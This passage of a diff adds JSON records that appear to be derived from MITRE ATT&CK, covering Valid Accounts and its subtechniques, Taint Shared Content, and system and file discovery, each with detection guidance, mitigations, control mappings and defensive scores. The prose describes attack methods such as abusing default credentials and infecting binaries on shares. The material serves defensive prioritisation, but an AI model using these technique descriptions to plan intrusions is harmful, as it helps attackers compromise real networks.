+        "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)",
+        "url": "https://attack.mitre.org/techniques/T1078",
+        "tactics": [
+            "Defense Evasion",
+            "Initial Access",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nPerform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "Logon Session: Logon Session Metadata",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1078.001",
+                "name": "Valid Accounts: Default Accounts",
+                "url": "https://attack.mitre.org/techniques/T1078/001",
+                "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)",
+                "detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+                "mitigations": [
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    }
+                ]
+            },
+            {
+                "tid": "T1078.002",
+                "name": "Valid Accounts: Domain Accounts",
+                "url": "https://attack.mitre.org/techniques/T1078/002",
+                "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
+                "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nOn Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) \n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            },
+            {
+                "tid": "T1078.003",
+                "name": "Valid Accounts: Local Accounts",
+                "url": "https://attack.mitre.org/techniques/T1078/003",
+                "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
+                "detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.",
+                "mitigations": [
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1078.004",
+                "name": "Valid Accounts: Cloud Accounts",
+                "url": "https://attack.mitre.org/techniques/T1078/004",
+                "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.",
+                "detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.",
+                "mitigations": [
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1013",
+                "name": "Application Developer Guidance",
+                "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
+                "url": "https://attack.mitre.org/mitigations/M1013"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 1.3577231300000001,
+        "adjusted_score": 1.3577231300000001,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.1",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.8",
+            "16.1",
+            "16.9"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-5",
+            "CM-6",
+            "IA-12",
+            "IA-2",
+            "IA-5",
+            "RA-5",
+            "SA-10",
+            "SA-11",
+            "SA-15",
+            "SA-16",
+            "SA-17",
+            "SA-3",
+            "SA-4",
+            "SA-8",
+            "SC-28",
+            "SI-4",
+            "SR-6"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.8,
+            "mitigation_score": 0.6181818181818182,
+            "detection_score": 1
+        },
+        "choke_point_score": 0.55,
+        "prevalence_score": 0.00772313
+    },
+    {
+        "tid": "T1078.001",
+        "name": "Valid Accounts: Default Accounts",
+        "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)",
+        "url": "https://attack.mitre.org/techniques/T1078/001",
+        "tactics": [
+            "Defense Evasion",
+            "Initial Access",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.",
+        "platforms": [
+            "Azure AD",
+            "Containers",
+            "Google Workspace",
+            "IaaS",
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1078",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            }
+        ],
+        "cumulative_score": 0.3047619047619048,
+        "adjusted_score": 0.3047619047619048,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.2"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "SA-10",
+            "SA-11",
+            "SA-15",
+            "SA-16",
+            "SA-17",
+            "SA-3",
+            "SA-4",
+            "SA-8",
+            "SC-28",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1078.002",
+        "name": "Valid Accounts: Domain Accounts",
+        "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
+        "url": "https://attack.mitre.org/techniques/T1078/002",
+        "tactics": [
+            "Defense Evasion",
+            "Initial Access",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nOn Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) \n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "Logon Session: Logon Session Metadata",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1078",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.3857142857142857,
+        "adjusted_score": 0.3857142857142857,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.1",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CM-5",
+            "CM-6",
+            "IA-12",
+            "IA-2",
+            "IA-5",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1078.003",
+        "name": "Valid Accounts: Local Accounts",
+        "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
+        "url": "https://attack.mitre.org/techniques/T1078/003",
+        "tactics": [
+            "Defense Evasion",
+            "Initial Access",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.",
+        "platforms": [
+            "Containers",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "Logon Session: Logon Session Metadata",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1078",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.4380952380952381,
+        "adjusted_score": 0.4380952380952381,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.1",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "IA-12",
+            "IA-2",
+            "SA-10",
+            "SA-11",
+            "SA-15",
+            "SA-16",
+            "SA-17",
+            "SA-3",
+            "SA-4",
+            "SA-8",
+            "SC-28",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1078.004",
+        "name": "Valid Accounts: Cloud Accounts",
+        "description": "Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)\n\nCompromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.",
+        "url": "https://attack.mitre.org/techniques/T1078/004",
+        "tactics": [
+            "Defense Evasion",
+            "Initial Access",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.",
+        "platforms": [
+            "Azure AD",
+            "Google Workspace",
+            "IaaS",
+            "Office 365",
+            "SaaS"
+        ],
+        "data_sources": [
+            "Logon Session: Logon Session Creation",
+            "Logon Session: Logon Session Metadata",
+            "User Account: User Account Authentication"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1078",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.5761904761904761,
+        "adjusted_score": 0.5761904761904761,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.1",
+            "5.2",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.3",
+            "6.4",
+            "6.5",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-20",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "AC-7",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "IA-12",
+            "IA-2",
+            "IA-5",
+            "SA-10",
+            "SA-11",
+            "SA-15",
+            "SA-16",
+            "SA-17",
+            "SA-3",
+            "SA-4",
+            "SA-8",
+            "SC-28",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1080",
+        "name": "Taint Shared Content",
+        "description": "\nAdversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.\n\nA directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)\n\nAdversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.",
+        "url": "https://attack.mitre.org/techniques/T1080",
+        "tactics": [
+            "Lateral Movement"
+        ],
+        "detection": "Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.\n\nFrequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.",
+        "platforms": [
+            "Linux",
+            "Office 365",
+            "SaaS",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "File: File Creation",
+            "File: File Modification",
+            "Network Share: Network Share Access",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1050",
+                "name": "Exploit Protection",
+                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                "url": "https://attack.mitre.org/mitigations/M1050"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.47171102142857146,
+        "adjusted_score": 0.47171102142857146,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5",
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2",
+            "6.8",
+            "10.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "CA-7",
+            "CM-2",
+            "CM-7",
+            "SC-4",
+            "SC-7",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.17142857142857143,
+            "mitigation_score": 0.3090909090909091,
+            "detection_score": 0.02
+        },
+        "choke_point_score": 0.30000000000000004,
+        "prevalence_score": 0.00028245
+    },
+    {
+        "tid": "T1082",
+        "name": "System Information Discovery",
+        "description": "An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nTools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n\nInfrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)",
+        "url": "https://attack.mitre.org/techniques/T1082",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Instance: Instance Metadata",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.6806753333333333,
+        "adjusted_score": 0.6806753333333333,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.13333333333333333,
+            "detection_score": 0.28
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.447342
+    },
+    {
+        "tid": "T1083",
+        "name": "File and Directory Discovery",
+        "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).",
+        "url": "https://attack.mitre.org/techniques/T1083",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.3798930714285714,
+        "adjusted_score": 0.3798930714285714,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
